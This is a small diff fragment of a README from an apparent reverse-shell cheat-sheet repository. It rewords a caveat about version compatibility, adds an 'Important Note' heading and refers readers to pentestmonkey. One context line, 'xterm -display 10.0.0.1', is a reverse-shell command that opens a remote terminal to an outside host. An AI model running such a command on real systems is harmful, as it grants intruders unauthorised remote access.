inforkgodara/reverse-shell/README.md

 xterm -display 10.0.0.1

+## Important Note

-Note: if the technology version changed these codes may not work.
+If the technology version changed these codes may not work.
 Please check out https://pentestmonkey.net for latest update.

 Happy Hacking